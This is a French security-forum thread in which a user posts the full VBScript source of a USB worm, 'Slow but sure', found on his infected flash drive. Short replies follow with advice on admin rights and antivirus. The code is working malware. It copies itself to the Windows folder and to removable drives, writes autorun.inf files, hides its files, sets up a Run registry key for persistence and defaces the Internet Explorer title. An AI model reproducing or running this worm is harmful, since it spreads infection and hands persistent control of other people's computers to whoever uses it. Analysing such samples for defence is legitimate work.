[Code source] Virus W32/Slow

Moderator: Mod

[Code source] Virus W32/Slow

Postby DENEKAR » Thu Feb 04, 2010 4:32 pm

Voilà, un pote a été infecté par un ver et il se trouve que je lui avais passé ma clef, que j'ai récupérée infectée.
Heureusement, j'avais booté sur Ubuntu, donc aucun soucis :D
Je vous donne le code:
[code:1:8ba90a2965]'My name is Slow but sure V0.05
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\MS32DLL.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by Godzilla"
rg.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname[/code:1:8ba90a2965]
DENEKAR
Projets
 
Posts: 12
Joined: Fri Jan 15, 2010 7:15 pm

Postby feldo » Fri Apr 09, 2010 10:40 am

Étant novice tu peux me dire a quoi sert tout ceci :?:
User avatar
feldo
Projets
 
Posts: 33
Joined: Sun Apr 04, 2010 1:30 pm
Location: 69

Postby Manu404 » Fri Apr 09, 2010 1:58 pm

Halala, très simple ce code.
Bizare que ton antivirus ne l'ai pas détecté (en as tu un ???)
De plus, pourquoi reste tu en admin ? Pour exécuter le code des droits d'admin son nécessaire, donc si tu utilisais un utilisateur simple, tu n'aurais pas de soucis...
Et pour finir, il modifier/lis des register key.

Enfin bref, pour éviter ce genre de crasse :
Utiliser un user admin que quand c'est absolument nécessaire
Installer un antivir/antispy
Faire des backup régulièrement
User avatar
Manu404
 
Posts: 2219
Joined: Tue Feb 26, 2008 3:44 pm
Location: ::1:

Postby feldo » Sat Apr 10, 2010 7:01 am

Ben je suis en admin.
User avatar
feldo
Projets
 
Posts: 33
Joined: Sun Apr 04, 2010 1:30 pm
Location: 69

Postby Manu404 » Sat Apr 10, 2010 6:22 pm

Ouais bein justement --'
Relis mon poste et rend toi compte de ce que tu vien de dire...
User avatar
Manu404
 
Posts: 2219
Joined: Tue Feb 26, 2008 3:44 pm
Location: ::1:

Postby S » Sun Apr 11, 2010 12:58 am

[quote:0c46f8459f="EMRE"]Étant novice tu peux me dire a quoi sert tout ceci :?:[/quote:0c46f8459f]
C'est un vers sa sert a infecté ton PC (et ou a apprendre comment il fonctionne)!
S
Projets
 
Posts: 271
Joined: Thu Mar 27, 2008 2:46 am


Return to Virologie informatique

Who is online

Users browsing this forum: No registered users and 1 guest

cron